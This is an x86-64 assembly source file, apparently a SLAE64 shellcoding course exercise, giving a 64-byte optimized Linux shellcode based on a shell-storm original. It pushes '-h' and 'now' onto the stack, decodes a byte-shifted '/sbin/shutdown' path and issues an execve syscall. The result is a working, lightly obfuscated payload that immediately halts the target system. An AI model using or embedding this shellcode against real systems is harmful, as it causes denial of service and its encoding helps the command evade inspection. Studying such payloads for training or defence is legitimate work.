; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================
 
section .text
global _start
 
_start:
 
xor rax, rax                ; clear rax and rdx
cdq
 
; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------
 
push rax
push word 0x682d ;-h
push rsp
pop rcx
 
; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------
 
push rax
push byte 0x77
push word 0x6f6e ; now
push rsp
pop rbx
 
push rax
push rbx
push rcx
 
; -------------------------------------------------------------------
; 3. store '/sbin/shutdown' on stack
; -------------------------------------------------------------------
 
push rsp
pop rsi
 
push rax
jmp shutdown
cont:
pop rdi
 
push 15
pop rcx
 
do_add:
    add byte [rdi+rcx], 0x01
    loop do_add
 
push 59
pop rax
syscall
 
shutdown:
    call cont
    c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d